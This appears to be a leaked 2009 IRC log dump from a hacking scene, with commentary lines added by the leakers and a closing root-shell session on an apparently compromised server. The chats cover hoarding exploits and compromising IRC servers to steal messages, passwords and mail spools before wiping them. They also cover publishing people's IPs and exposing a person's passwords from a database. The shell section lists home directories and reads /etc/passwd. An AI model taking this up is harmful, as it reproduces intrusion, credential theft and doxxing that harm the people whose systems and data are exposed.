09:13 (Glyph) tipped the scales in my favour.
|
||
09:14 (Glyph) The more it gets done, the more likely it is the 0day is exposed.
|
||
09:14 (RoMeO) ofcourse
|
||
09:14 (Glyph) Now.. that does NOT mean that all that have the product haven't alreay been 'had'
|
||
09:14 (Glyph) But it does lead to disclosure.
|
||
09:15 (Glyph) 'Even a blind pig finds an acorn every now and then'
|
||
09:15 (RoMeO) sure, i understand
|
||
09:15 (Glyph) And InfoSec isn't st00pid like Dark seems to think.
|
||
// Really ?
|
||
|
||
09:15 (RoMeO) i never underestimate anyone
|
||
09:15 (RoMeO) thats my rule
|
||
|
||
09:16 (Glyph) If I can already see 'glimpses', you can bet others out there can as well.
|
||
09:17 (RoMeO) let them see it, antisec got more tricks up the sleeves ;p
|
||
09:17 -> Glyph chuckles
|
||
09:17 (Glyph) I'm well aware of that.
|
||
09:17 (Glyph) But don't ya just hate losing 'weaponized' shit for a lark?
|
||
09:18 (Glyph) Put that arrow back in yer quiver.. might be really useful sometime down the road.
|
||
09:18 (RoMeO) yeah, i understand you, and again it was just to prove something to someone... nothing was left behind, those 'acts' rarely ever happen
|
||
09:19 (Glyph) Thing is.. WTF did you need to prove any damn thing to Dark?
|
||
09:19 (Glyph) Scratch that.. change pronouns to third person ;)
|
||
09:19 (RoMeO) its between me and him ;p
|
||
09:19 (RoMeO) he talks alot
|
||
09:21 (Glyph) You know I log the publics?
|
||
09:21 (RoMeO) i assume alot do
|
||
|
||
09:22 (RoMeO) i just hope you dont log privates
|
||
|
||
09:37 (RoMeO) so your job is basically... ?
|
||
09:40 (Glyph) Coordinator, IT Research and Special Projects.. in a 2 year college
|
||
09:40 (RoMeO) nice, well i will bbl
|
||
09:41 (Glyph) Ciao.. and yes that's enough info to figure out who I am.
|
||
09:41 (RoMeO) haha
|
||
--- Log closed Wed Jun 17 09:46:34 2009
|
||
|
||
--- Log opened Wed Jun 17 14:21:36 2009
|
||
14:21 (Glyph) Aye.
|
||
14:22 (Glyph) Don't take the stuff I spin in channel to heart.
|
||
14:22 (RoMeO) :)
|
||
14:22 (Glyph) I'm interested in debating with Dark.
|
||
14:22 (RoMeO) yeah i saw
|
||
14:22 (Glyph) Plus it may actually spark some interest in the subject.
|
||
14:22 (RoMeO) but again, all he does is talk
|
||
14:22 (RoMeO) so what i did when i first met him was
|
||
14:22 (RoMeO) to shut him up
|
||
14:23 (RoMeO) i put him up on a challenge
|
||
14:23 (Glyph) It's a topic that every individual needs to make a decision about.
|
||
14:23 (RoMeO) we made some random guy on irc to post a random security site
|
||
14:23 (RoMeO) and the challenge was who gets access to it first
|
||
14:23 (RoMeO) i got in
|
||
14:23 (RoMeO) he didnt
|
||
14:23 (RoMeO) but he kept on arguing
|
||
14:23 (RoMeO) about how he got vulns on it, but its 'way over my league' rofl
|
||
14:24 (Glyph) You know what that sounds like to me?
|
||
14:24 (RoMeO) what
|
||
14:24 (Glyph) 'tempest in a teacup'
|
||
14:24 (RoMeO) lol
|
||
14:24 (Glyph) Notice he braced me in channel..
|
||
14:24 (Glyph) right.
|
||
14:24 (RoMeO) right
|
||
14:24 (Glyph) 'When did you stop beating your wife sir?'
|
||
14:25 (RoMeO) lol.
|
||
14:25 (Glyph) HE should be presuming that everyone has 'skillz' and can whoop his arse.
|
||
14:25 (RoMeO) he is all about talk, and its not like he just started this, no no, apparently he been around since 2000 and doing the -same- ever since
|
||
14:26 (Glyph) hmmm... I've been around a lot longer than that.
|
||
14:26 (RoMeO) yea, just saying its not like he does that here only or just now
|
||
14:26 (Glyph) Course I can plead ignorance.. not aware of a lot
|
||
14:26 (Glyph) Leopard isn't likely to change its spots
|
||
14:27 (RoMeO) haha
|
||
14:28 (RoMeO) webdevil knows alot about him too, he was there when he got kicked in his lil challenge
|
||
14:28 (RoMeO) and he didnt come back to the channel for a long long time after that
|
||
14:29 (Glyph) I presume you have an account at gso
|
||
14:29 (RoMeO) i dont know honestly
|
||
14:29 (RoMeO) but if ther was, it would be RoMeO
|
||
--- Log closed Wed Jun 17 14:34:34 2009
|
||
|
||
|
||
--- Log opened Thu Jun 18 17:35:20 2009
|
||
17:35 [Dark(~Administr@EclipticX-85D523E2.hlrn.qwest.net)] Wheres newtype hang these days?
|
||
17:35 [Dark(~Administr@EclipticX-85D523E2.hlrn.qwest.net)] Its been so long since I've talked with her
|
||
17:35 -pand!- Irssi: Starting query in bhf with Dark
|
||
17:36 (RoMeO) we just met on rizon
|
||
17:36 (RoMeO) for a small chat
|
||
17:36 (Dark) Word
|
||
17:36 (Dark) Can I safely assume she's all up in -antisec?
|
||
17:36 (Dark) In lieu of recent Astalavista incident?
|
||
17:38 (Dark) Well
|
||
17:38 (Dark) If you see her around again
|
||
17:38 (Dark) Tell her Dark says hi
|
||
17:38 (Dark) And thanks for everything
|
||
17:38 (RoMeO) what do yoou mean -antisec
|
||
17:38 (RoMeO) and willl do
|
||
17:39 (Dark) I mean
|
||
17:39 (Dark) She's probably restarting her actions
|
||
17:39 (Dark) In zfo and whatnot
|
||
17:39 (Dark) Just an assumption
|
||
17:39 (RoMeO) i dont know really, but she really liked the latest antisec movement
|
||
17:39 (RoMeO) actions etc
|
||
17:39 (Dark) Good to hear
|
||
17:39 (RoMeO) ^^
|
||
17:40 (Dark) Along time ago she said she had a ICMP exploit for IOS
|
||
17:40 (Dark) I may attempt to locate her and coax it out of her
|
||
17:40 (Dark) Seeing as she's probably not using it anymore
|
||
17:40 (RoMeO) yea, she is out of all this for now
|
||
17:40 (RoMeO) too busy and whatnot
|
||
17:40 (Dark) Haha
|
||
17:41 (Dark) She's majoring in CompSci yea?
|
||
17:41 (RoMeO) yes ;\
|
||
17:41 (Dark) Eh
|
||
17:41 (RoMeO) i hate CS
|
||
17:41 (Dark) Shoulda known
|
||
17:41 (Dark) Same
|
||
17:41 (RoMeO) too broad
|
||
17:41 (Dark) Fucking Linguistics + Econ for great justice
|
||
17:41 (RoMeO) java is gay
|
||
17:42 (Dark) To be honest, I haven't seen alot of the oldschool people for a really long time
|
||
17:42 (RoMeO) yeah
|
||
17:42 (Dark) Theres a few left here and there
|
||
17:42 (RoMeO) everyone gets busy for some time
|
||
17:42 (Dark) I wish they'd pop up
|
||
17:42 (RoMeO) but they all come back eventually
|
||
17:42 (Dark) I guess making a new antisec is where its gotta be
|
||
17:42 (RoMeO) i hope anyways
|
||
17:43 (Dark) I think defcon should go over well
|
||
17:43 (RoMeO) yes, new movement and just wait for people to join from diff communities
|
||
17:43 (Dark) After that
|
||
17:43 (Dark) As I see it
|
||
17:43 (Dark) Its all out war
|
||
17:43 (RoMeO) rawr
|
||
17:43 (Dark) So start saving your exploits nao
|
||
17:43 (RoMeO) hidden in sekret boxen ;O
|
||
17:44 (Dark) For sure
|
||
17:44 (RoMeO) lcirc is being monitored now
|
||
17:44 (RoMeO) they host #milw0rm and #bottalk
|
||
17:44 (Dark) Probably
|
||
17:45 (RoMeO) no like. i know for sure
|
||
17:45 (Dark) Monitored by pr0jekt types, or by the feds?
|
||
17:45 (RoMeO) pr0ject types
|
||
17:45 (Dark) I figured as much
|
||
17:45 (RoMeO) and feds ofcourse, but pr0ject types got the root shell
|
||
17:46 (Dark) You know what the intentions are?
|
||
17:46 (RoMeO) take down after exposure
|
||
17:46 (RoMeO) intel, private messages, passwords, mail spools, then rm -rf
|
||
17:46 (Dark) can't say I've ever really been to lcirc
|
||
17:46 (RoMeO) should get them all to stop
|
||
17:47 (Dark) Owning milw0rm is a reasonable priority
|
||
17:47 (Dark) As well as Secfocus of course
|
||
17:47 (RoMeO) it is in the right hands
|
||
17:47 (RoMeO) :]
|
||
17:47 (Dark) I've been trying to go rogue on some stuff
|
||
17:47 (Dark) I'm not part of any group per se now that
|
||
17:48 (RoMeO) neither ami
|
||
17:48 (RoMeO) doing it on my own
|
||
17:48 (RoMeO) i function better solo
|
||
--- Log closed Thu Jun 18 18:07:45 2009
|
||
|
||
--- Log opened Fri Jun 19 09:07:17 2009
|
||
09:07 [BSDGurl(BSDGurl@cloaked-A4E6952B.dyn-quarter5.area51.mil)] back
|
||
09:07 [BSDGurl(BSDGurl@cloaked-A4E6952B.dyn-quarter5.area51.mil)] are you excited about leaving?
|
||
09:09 -pand!- Irssi: Starting query in secchat with BSDGurl
|
||
09:09 (RoMeO) well yea ;D
|
||
09:10 (BSDGurl) i was reading the logs this morning and like
|
||
09:11 (BSDGurl) i have to tell romeo good luck and to be safe etc before he leaves
|
||
09:11 (BSDGurl) i know you will have Internet but still
|
||
09:11 (RoMeO) :)
|
||
09:11 (RoMeO) thxthx
|
||
09:11 (BSDGurl) it's kind of scary
|
||
09:12 (BSDGurl) i was scared to start uni here
|
||
09:12 (RoMeO) thats why i moved bounces this week, i will be idle here 24/7 and read logs / messsages at night / whenver i can get online
|
||
09:12 (BSDGurl) hahahaha
|
||
09:12 (RoMeO) lawl, i am excitted
|
||
09:12 (BSDGurl) yes it was like a mix
|
||
09:13 (RoMeO) yea it is a mix of being scared and excitted, but all good
|
||
09:13 (BSDGurl) i hope you learn and are not bored
|
||
09:13 (BSDGurl) do you have maths and things?
|
||
09:13 (RoMeO) no thanks god
|
||
09:13 (BSDGurl) yes
|
||
09:14 (RoMeO) maths might be involved in a few chapters of the software engineeering, but all good
|
||
09:14 (RoMeO) not like computer science for example, which is all around maths and java -_-
|
||
09:14 (BSDGurl) hahahaa java
|
||
09:14 (RoMeO) yea...
|
||
09:14 (BSDGurl) you know i don't hate java
|
||
09:14 (BSDGurl) it's just all those guys
|
||
09:14 (RoMeO) i hate it cause of what i hear from those people
|
||
09:14 (BSDGurl) they ride the nuts
|
||
09:14 (BSDGurl) so hard
|
||
09:14 (RoMeO) lmao
|
||
09:14 (BSDGurl) it's like
|
||
09:14 (BSDGurl) funny
|
||
09:15 (BSDGurl) i can't help it
|
||
09:15 (RoMeO) this friend of mine in uni now
|
||
09:15 (RoMeO) his CS teacher walks in the room daily
|
||
09:15 (RoMeO) and screams
|
||
09:15 (RoMeO) JAVA IS THE FUTURE
|
||
09:15 (RoMeO) :|
|
||
09:15 (BSDGurl) rofl
|
||
09:15 (RoMeO) true story
|
||
09:15 (BSDGurl) they all do
|
||
09:15 (BSDGurl) hahahaha
|
||
09:15 (RoMeO) thats scary lol
|
||
09:15 (BSDGurl) i know
|
||
09:15 (RoMeO) how could java be possibly the future
|
||
09:16 (RoMeO) possibly be*
|
||
09:16 (BSDGurl) that's why i can't help but just say things to piss them off
|
||
09:16 (BSDGurl) i don't even care
|
||
09:16 (RoMeO) every lang got its use, kthxbai
|
||
09:16 (BSDGurl) i am like no
|
||
09:16 (BSDGurl) i don't even know java
|
||
09:16 (RoMeO) me too lmao
|
||
09:16 (BSDGurl) it maybe the future for all i know
|
||
09:16 (BSDGurl) hahaha
|
||
09:16 (RoMeO) future of wat xD
|
||
09:16 (BSDGurl) i just imagine them all pissed off
|
||
09:16 (RoMeO) lmao
|
||
09:16 (RoMeO) 'oh shit'
|
||
09:17 (BSDGurl) i went to rootsecurity the other night to see what was going on
|
||
09:18 (RoMeO) gay
|
||
09:18 (BSDGurl) cos this place is so dea
|
||
09:18 (BSDGurl) d
|
||
09:18 (BSDGurl) of course it was like
|
||
09:18 (BSDGurl) you are some pic
|
||
09:18 (BSDGurl) or this or that
|
||
09:18 (RoMeO) lol wow
|
||
09:18 (BSDGurl) i swear i can't go anywhere
|
||
09:18 (RoMeO) ;(
|
||
09:18 (RoMeO) - /nick BSDBoi
|
||
09:18 (BSDGurl) haha
|
||
09:18 (RoMeO) lolol
|
||
09:19 (BSDGurl) i don't understand i
|
||
09:19 (BSDGurl) t
|
||
09:19 (RoMeO) its internet
|
||
09:19 (BSDGurl) you know the big deal
|
||
09:19 (BSDGurl) oh and the guy
|
||
09:19 (BSDGurl) the one you banned that asked me if i was nell
|
||
09:19 (RoMeO) lol yea
|
||
09:19 (BSDGurl) he joined bhf and said
|
||
09:19 (BSDGurl) this chan is for fags
|
||
09:20 (BSDGurl) then left
|
||
09:20 (BSDGurl) rofl
|
||
09:20 (RoMeO) ;O
|
||
09:20 (RoMeO) he gots issues
|
||
09:20 (BSDGurl) so you know i am expecting people to say
|
||
09:20 (BSDGurl) bsdgurl this is you
|
||
09:20 (BSDGurl) and show me someone named nell now
|
||
09:20 (BSDGurl) hahaha
|
||
09:20 (RoMeO) xD
|
||
09:20 (RoMeO) 'i had you on myspace'
|
||
09:20 (RoMeO) wat
|
||
09:20 (RoMeO) .
|
||
09:21 (BSDGurl) i know
|
||
09:21 (BSDGurl) god being on that site
|
||
09:21 (BSDGurl) i was years ago
|
||
09:21 (RoMeO) facebook is nice ;p
|
||
|
||
// http://www.facebook.com/profile.php?id=1119054258 :)
|
||
|
||
09:21 (BSDGurl) like i haven't been for at least 2
|
||
09:21 (BSDGurl) no lie
|
||
09:21 (BSDGurl) i wouldn't lie i still have all the flash profiles i made etc
|
||
09:22 (RoMeO) haha
|
||
09:22 (BSDGurl) you know because you could custom it
|
||
09:22 (RoMeO) yeah
|
||
09:22 (RoMeO) not a myspace fan
|
||
09:22 (RoMeO) tho
|
||
09:22 (BSDGurl) me either now
|
||
09:22 (RoMeO) facebook is simple and good
|
||
09:22 (BSDGurl) i have an account
|
||
09:22 (BSDGurl) it's fake
|
||
09:23 (RoMeO) lol i hae a fake account with my public email there
|
||
09:23 (BSDGurl) last log in was december i think
|
||
09:23 (RoMeO) and i lol when people join dmz to tell me
|
||
09:23 (RoMeO) 'hello john genter'
|
||
09:23 (RoMeO) cause the name there is john genter
|
||
09:23 (RoMeO) lmfao
|
||
09:23 (BSDGurl) rofl
|
||
09:23 (BSDGurl) i hate that myspace shit though
|
||
09:23 (BSDGurl) seriously
|
||
09:24 (RoMeO) yeah
|
||
09:24 (BSDGurl) so yeah i am nell
|
||
09:24 (BSDGurl) haha
|
||
09:24 (RoMeO) hai nell
|
||
09:24 (RoMeO) xD
|
||
09:24 (RoMeO) http://www.nellmcandrew.tv/
|
||
09:24 (BSDGurl) i am curious to see if meathive stays
|
||
09:24 (RoMeO) i lol'd
|
||
09:25 (BSDGurl) last night he was really pissed at asta
|
||
09:25 (RoMeO) yea i saw
|
||
09:25 (BSDGurl) i told him you know the servers aren't related
|
||
09:25 (BSDGurl) but i don't think he believed me
|
||
09:25 (RoMeO) what servers
|
||
09:26 (RoMeO) irc and web?
|
||
09:26 (BSDGurl) they irc
|
||
09:26 (BSDGurl) the
|
||
09:26 (RoMeO) yeah
|
||
09:26 (RoMeO) its ok lol
|
||
09:26 (BSDGurl) i didn't want to like go into with him
|
||
09:27 (BSDGurl) i was just like do what you think is best:/
|
||
09:27 (BSDGurl) i didn't know what to say
|
||
09:27 (RoMeO) haha, what is he doing anyways
|
||
09:27 (RoMeO) i just saw a rant
|
||
09:27 (BSDGurl) i know
|
||
09:27 (BSDGurl) i don't know what
|
||
09:28 (RoMeO) i think people should move on already
|
||
09:28 (BSDGurl) Me TOO
|
||
09:28 (RoMeO) lol!
|
||
09:28 (BSDGurl) thank you
|
||
09:28 (RoMeO) sites get hacked all the time
|
||
09:28 (BSDGurl) you know what i said
|
||
09:28 (BSDGurl) think about this
|
||
09:28 (BSDGurl) you know if you staged
|
||
09:28 (BSDGurl) that
|
||
09:29 (BSDGurl) and threw those ads
|
||
09:29 (BSDGurl) back up
|
||
09:29 (RoMeO) stunt
|
||
09:29 (BSDGurl) you would make bank
|
||
09:29 (RoMeO) yes.
|
||
09:29 (BSDGurl) :)
|
||
09:29 (RoMeO) everyone checks asta now to see whats new in the 'hack'
|
||
09:29 (RoMeO) lolol
|
||
09:29 (BSDGurl) yes
|
||
09:29 (BSDGurl) think about that
|
||
09:29 (RoMeO) it got more backlinmks than google over night
|
||
09:29 (BSDGurl) membership down
|
||
09:30 (BSDGurl) etc
|
||
09:30 (BSDGurl) now look
|
||
09:30 (BSDGurl) cash in
|
||
09:30 (BSDGurl) think about it for darkmindz too
|
||
09:30 (BSDGurl) hahaha
|
||
09:30 (RoMeO) lmfao
|
||
09:30 (RoMeO) 'HACKED AND EXPOSED'
|
||
09:30 (BSDGurl) pwn xlink
|
||
09:31 -> BSDGurl dies
|
||
09:31 (RoMeO) and put all kinda ads on there, and blame the hacker
|
||
09:31 (BSDGurl) yes
|
||
09:31 (RoMeO) fun
|
||
09:31 (RoMeO) if i ever need money in uni, thats plan A
|
||
09:31 (BSDGurl) biber can be fall guy
|
||
09:31 (BSDGurl) hahaha
|
||
09:31 (RoMeO) ^^
|
||
09:32 (BSDGurl) let me go back to art shit
|
||
09:32 (RoMeO) oh enjoy
|
||
09:32 (BSDGurl) i just wanted to tell you have a safe trip
|
||
09:33 (RoMeO) thank you <3
|
||
09:33 (BSDGurl) if i didnt get to talk
|
||
09:33 (RoMeO) ^_^
|
||
09:33 (BSDGurl) <3 you are very welcome
|
||
--- Log closed Fri Jun 19 09:34:04 2009
|
||
|
||
--- Log opened Sun Jun 21 09:24:55 2009
|
||
09:24 [{Glyph_Home}(~glyph@mods.govsec.org)] btw, unless it's been you whacking GSO, the technique is becoming widespread.
|
||
09:25 -INFO- Irssi: Starting query in bhf with {Glyph_Home}
|
||
09:25 (RoMeO) mm?
|
||
09:28 (RoMeO) what are you talking about lol
|
||
09:29 ({Glyph_Home}) GSO has had issues this past week.
|
||
09:29 ({Glyph_Home}) I thought perhaps you were the reason.
|
||
09:29 (RoMeO) because rsnake released a DoS tool
|
||
09:29 (RoMeO) nope
|
||
09:29 ({Glyph_Home}) No.. the litespeed issue
|
||
09:29 (RoMeO) my issues dont go on lagging web servers
|
||
09:30 ({Glyph_Home}) Though I have no idea why you'd nail GSO
|
||
09:30 ({Glyph_Home}) Doesn't seem to be your 'venue'
|
||
09:30 (RoMeO) that too
|
||
09:31 ({Glyph_Home}) I've already talked with Edu and WebDevil..
|
||
09:31 (RoMeO) about
|
||
09:31 ({Glyph_Home}) Gonna make my 'recommends' to the admins this week.
|
||
09:31 (RoMeO) i find it funny how staff at 'black hat forums' get to be staff at ' gov sec'
|
||
09:32 ({Glyph_Home}) Quesion: Any tips on 'mitigating' the /g0troot issue?
|
||
09:32 -> {Glyph_Home} chuckles
|
||
09:32 ({Glyph_Home}) Not exactly a 'whitehat' myself.
|
||
09:32 (RoMeO) lolol
|
||
09:32 ({Glyph_Home}) I just don't 'participate' in the darkside anymore.
|
||
09:33 (RoMeO) just keep the site clean, didnt see gso being mentioned anywhere as a target, ever
|
||
09:33 (RoMeO) so all good
|
||
09:33 ({Glyph_Home}) Used to..
|
||
|
||
09:33 (RoMeO) but people who are going down soon are botnet communities for example
|
||
09:34 ({Glyph_Home}) hmmm... Sounds like a shadowserver operation.
|
||
09:34 (RoMeO) just cleaning the net
|
||
09:34 ({Glyph_Home}) Straight out of the 'toyshop'
|
||
09:34 (RoMeO) :]
|
||
09:35 ({Glyph_Home}) Antisec is beginning to sound more like 'cybercops'
|
||
09:36 (RoMeO) haha
|
||
|
||
09:36 (RoMeO) wont be done under antisec
|
||
09:36 (RoMeO) antisec is kept for 'security' issues
|
||
09:36 (RoMeO) this is, botnet and skids crap
|
||
|
||
09:36 ({Glyph_Home}) hmmm...
|
||
09:37 ({Glyph_Home}) IFF I can be of assistance, without endangering current position, I offer my not so hot skill sets.
|
||
09:37 (RoMeO) all good so far
|
||
09:37 (RoMeO) lcirc and indoirc got comprimised
|
||
09:37 (RoMeO) the 2 largest botnet and ccpower ircd's
|
||
09:38 ({Glyph_Home}) w00f
|
||
09:38 (RoMeO) ;)
|
||
09:38 ({Glyph_Home}) Might be an idea for the info to make it back to the ccproviders.. discretely and anonymously of course.
|
||
09:38 (RoMeO) well
|
||
09:38 (RoMeO) the idea is
|
||
09:39 (RoMeO) to release all intel and ip's on the people who started those channels / irc's
|
||
09:39 (RoMeO) out in the public and all over the net
|
||
09:39 (RoMeO) let the authorities deal with that
|
||
09:39 ({Glyph_Home}) roflmao
|
||
09:39 (RoMeO) :]
|
||
09:39 (RoMeO) brb
|
||
--- Log closed Sun Jun 21 09:44:31 2009
|
||
|
||
|
||
--- Log opened Mon Jun 22 16:15:04 2009
|
||
16:15 (Glyph) ?
|
||
16:15 (Glyph) Oh.. that stuff
|
||
16:15 (Glyph) Old stuff.. was playing more or less.
|
||
16:16 (Glyph) Course my 'playtime' tends to lead to profitability ;)
|
||
16:16 (Glyph) All that is at least five years old or older.
|
||
16:16 (Glyph) circa 2005
|
||
16:17 (RoMeO) yeah
|
||
16:17 (RoMeO) thinking of setting up a box for dark
|
||
16:17 (RoMeO) see what is he going to do
|
||
16:17 (RoMeO) ofcourse everything will be patched to log in's and out's // HOOKIN.. HOOKOUT..
|
||
16:18 (Glyph) Well you know the saying.. friends close, enemies closer ;)
|
||
16:18 (RoMeO) yeah
|
||
16:18 (RoMeO) sure do
|
||
16:18 (Glyph) Can't believe spike threw error's like that, and that's what he recommended?
|
||
16:18 (RoMeO) lol
|
||
16:19 (RoMeO) thats why i want to see what is he goign to do on a box
|
||
16:19 (RoMeO) anyone can talk
|
||
16:19 (RoMeO) specially on the internet
|
||
16:19 (Glyph) I'm beginning to think he 'talk's a good game'..
|
||
16:19 (Glyph) snap!
|
||
16:19 (RoMeO) :P
|
||
16:19 (RoMeO) thats what i heared from everyone so far
|
||
16:19 (RoMeO) i will even give him a none chrooted shell
|
||
16:19 (Glyph) Have you lost your mind?
|
||
16:19 (RoMeO) lol
|
||
16:19 (Glyph) Damn if I'd trust him that far.
|
||
16:20 (RoMeO) it will be an empty box
|
||
16:20 (Glyph) jailed, maybe.. unjailed never.
|
||
16:20 (RoMeO) and every shell is modified to log to a remote system
|
||
16:20 (Glyph) Now yer sounding like me.
|
||
16:20 (RoMeO) i will sit there wth a cop of tea and tail -f
|
||
16:21 (Glyph) tail -f firewall | grep 'insert key phrase of the day here'
|
||
16:28 (RoMeO) reading stories about knuth
|
||
16:28 (RoMeO) how to own a continent for example
|
||
16:28 (RoMeO) that one is amazing
|
||
16:29 (Glyph) It's NOT hard.
|
||
16:29 (RoMeO) if you didnt read it, you should
|
||
16:38 (RoMeO) i was looking around dark for a while
|
||
16:38 (RoMeO) and what surprised me is
|
||
16:38 (RoMeO) his really low-quality passwords
|
||
16:38 (RoMeO) like
|
||
16:38 (RoMeO) 123123
|
||
16:38 (RoMeO) or 123pass
|
||
16:38 (RoMeO) etc
|
||
16:38 (RoMeO) made me go ?
|
||
16:39 (Glyph) almost as bad as qwerty12345
|
||
16:39 (RoMeO) yes
|
||
16:40 (RoMeO) just one more thing that shows he is talk-only
|
||
16:40 (RoMeO) okay he can argue that he doesnt 'reuse passwords' but using really weak passwords -does- mean something
|
||
16:40 (Glyph) worse yet.. he could be a c&p
|
||
16:40 (RoMeO) that would be so bad
|
||
16:43 (Glyph) Yeah.. it would.
|
||
16:44 (Glyph) Actually, I sometimes think you and he are one in same and are playing 'mindfuck' with me.
|
||
16:44 (RoMeO) hahaa
|
||
16:44 (RoMeO) why would we tho
|
||
16:45 (Glyph) Because you were bored with the brainless fucks we normally encounter.
|
||
16:46 (RoMeO) when that happens i just log on a shell and explore ;p
|
||
16:46 (RoMeO) one more thing
|
||
16:46 (RoMeO) dark is a yahoo user
|
||
16:46 (RoMeO) that counts
|
||
16:47 (RoMeO) thats -100 sec points
|
||
16:47 (RoMeO) i do tag people by there email s too
|
||
16:47 (RoMeO) for example
|
||
16:47 (RoMeO) yahoo users, mostly newbies / females
|
||
16:48 (RoMeO) hotmail users, same thing but a higher level a small higher level
|
||
16:48 (RoMeO) gmail users are on top and above that comes the people with there own mail servers
|
||
16:48 (RoMeO) its alot deeper than that, but thats just a quick explanation :P
|
||
16:50 (RoMeO) found 2 passwords of dark in my db
|
||
16:50 (RoMeO) and they both fail
|
||
16:50 (RoMeO) hellohello is one of them -_-'
|
||
--- Log closed Mon Jun 22 16:55:25 2009
|
||
|
||
--- Log opened Tue Jun 23 17:19:55 2009
|
||
17:19 (Glyph) ?
|
||
17:20 (RoMeO) 15:23:42 (Glyph) Apache/2.2.11 (FreeBSD)
|
||
17:20 (RoMeO) 15:24:33 (Glyph) Johnny_Demonik
|
||
17:20 (RoMeO) 15:27:48 (Glyph) ERROR: Database error.
|
||
17:20 (Glyph) Ahhh...
|
||
17:21 (Glyph) He came up out of 64.127.41.18
|
||
17:22 (RoMeO) ah
|
||
17:22 (Glyph) That ip is apparently a 'shell' anyhow there's port 9050 on it.
|
||
17:22 (Glyph) But it goes back to WestVirginia..
|
||
17:22 (RoMeO) yeah
|
||
17:23 (Glyph) Firm called Compucrash
|
||
17:23 (Glyph) Their webserver is at .3 of that range.
|
||
17:23 (RoMeO) alrit, lets just hope he comes back here, busy with another hack ;p
|
||
17:23 (Glyph) So silly me, I tried to access their ircd thru their webpage.
|
||
17:23 (RoMeO) lol
|
||
17:24 (Glyph) That's when the MySQL threw the error code at me.
|
||
17:24 (Glyph) Then I checked the forums.
|
||
17:24 (Glyph) You wouldn't believe it.. PHPBB3
|
||
17:24 (Glyph) Pr0nsters have already been at it.
|
||
17:24 (RoMeO) lmao
|
||
17:24 (RoMeO) yea
|
||
17:25 (RoMeO) i saw that one
|
||
17:25 (Glyph) Not heavily.. but that's prolly because it's 'under the radar'
|
||
17:25 (Glyph) Plus the bw is pricey as heck.
|
||
17:26 (Glyph) I'm heading home..
|
||
17:26 (Glyph) You have a good un.
|
||
17:26 (RoMeO) thanks
|
||
17:26 (RoMeO) enjoy
|
||
--- Log closed Tue Jun 23 17:31:25 2009
|
||
|
||
--- Log opened Wed Jun 24 17:11:08 2009
|
||
17:11 [Glyph(Glyph@mods.govsec.org)] http://74.125.47.132/search?q=cache:jdsSh2XXmQAJ:www.fcc.gov/mb/engineering/2008_PSIDs_form325.xls+%22MetroCast+Communications+of+Mississippi%22&cd=12&hl=en&ct=clnk&gl=us
|
||
--- Log closed Wed Jun 24 17:16:42 2009
|
||
|
||
--- Log opened Sat Jun 27 23:05:38 2009
|
||
23:09 8/[g</{Glyph_Home}8/(4/~glyph@mods.govsec.org8/)g8/]g you don't have anything to 'fear' from me mate.
|
||
23:10 8/[g</{Glyph_Home}8/(4/~glyph@mods.govsec.org8/)g8/]g I make sure I don't know anything.
|
||
|
||
// We make sure everyone else does..
|
||
|
||
23:46 8/[g</notrael8/(4/notrael@tdirc-F327CDE7.org8/)g8/]g hi
|
||
23:46 8/[g</notrael8/(4/notrael@tdirc-F327CDE7.org8/)g8/]g i like the ending you added to the dikline motto
|
||
23:46 8/[g</notrael8/(4/notrael@tdirc-F327CDE7.org8/)g8/]g "Never sell out, never surrender. Get in as anonymous, Leave with no trace.
|
||
--- Log closed Sun Jun 28 02:13:14 2009
|
||
|
||
|
||
|
||
_______ _______ _____
|
||
\ _ \ ___ __\ _ \ / | |
|
||
/ /_\ \\ \/ / /_\ \ / | |_
|
||
\ \_/ \> <\ \_/ \/ ^ /
|
||
\_____ /__/\_ \\_____ /\____ |
|
||
\/ \/ \/ |__|
|
||
.__ __ .__ .___
|
||
___ _|__|/ |______ | | ____________ ____ ____ __| _/______
|
||
\ \/ / \ __\__ \ | | / ___/\____ \_/ __ \_/ __ \ / __ |/ ___/
|
||
\ /| || | / __ \| |__\___ \ | |_> > ___/\ ___// /_/ |\___ \
|
||
\_/ |__||__| (____ /____/____ >| __/ \___ >\___ >____ /____ >
|
||
\/ \/ |__| \/ \/ \/ \/
|
||
__________ _________
|
||
\______ \_______ ____ / _____/ ____ ____
|
||
______ | ___/\_ __ \/ _ \\_____ \_/ __ \_/ ___\
|
||
/_____/ | | | | \( <_> ) \ ___/\ \___
|
||
|____| |__| \____/_______ /\___ >\___ >
|
||
\/ \/ \/
|
||
|
||
root@light [/]# hostname
|
||
light.co1.org
|
||
root@light [/]# uname -a
|
||
Linux light.co1.org 2.6.17.5-HN-2.3-P4 #1 SMP Sat Jul 15 09:55:04 EDT 2006 i686 i686 i386 GNU/Linux
|
||
root@light [/]# date
|
||
Tue Jun 23 20:06:26 EDT 2009
|
||
root@light [/]# cd /home
|
||
root@light [/home]# ls
|
||
./ blndbill/ .cpcpan/ deevour/ group88/ joshd/ lost+found/ nglgorg/ r00t/ timc/
|
||
../ blueacre/ cpeasyapache/ denial/ hadrys/ karbassi/ mapmap/ nickg/ radical/ timc14/
|
||
amp3dne/ bziem/ cprestore/ digital/ handknit/ kcole/ maraka/ noct/ rannman/ tmp/
|
||
animal/ cache/ cpzendinstall/ drireign/ harry3/ kidc/ mrwoot/ nycrob/ raven/ tradefx/
|
||
apadana/ cawn/ craig/ edgein/ hasting/ knokes/ msupike/ olliee/ robotey/ untitled/
|
||
aquota.user* cfurn/ ctcped/ fran459/ hastings/ kozmo/ munin/ pioneer/ russ43/ values/
|
||
army/ charice/ curator/ func88/ ircmilw/ kujio/ MySQL-install/ plumcree/ sheik/ vincent/
|
||
auxone/ chemmer/ daelenbe/ futonre/ jamesj/ kyle/ national/ porch46/ starr/ virtfs/
|
||
badassb/ christa/ danielc/ fxarbitr/ jb007/ lakeshor/ neptunes/ prime/ stopcand/ vitus/
|
||
bebe/ cmilone/ ddosmyi/ ganja/ jeffhem/ light/ netdevil/ psurge/ sub/ wrench/
|
||
berkel/ .cpan/ dear/ ganja51/ jer1h/ lithium/ netenberg/ qstud/ syscrash/ yasha/
|
||
billing/ cpapachebuild/ decalsby/ greg93/ jkaiser/ lost/ nglgnet/ quota.user* tickah/
|
||
root@light [/home]#
|
||
|
||
root@light [/home]# cat /etc/passwd
|
||
root:x:0:0:root:/root:/bin/bash
|
||
bin:x:1:1:bin:/bin:/sbin/nologin
|
||
daemon:x:2:2:daemon:/sbin:/sbin/nologin
|
||
adm:x:3:4:adm:/var/adm:/sbin/nologin
|
||
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
|
||
sync:x:5:0:sync:/sbin:/bin/sync
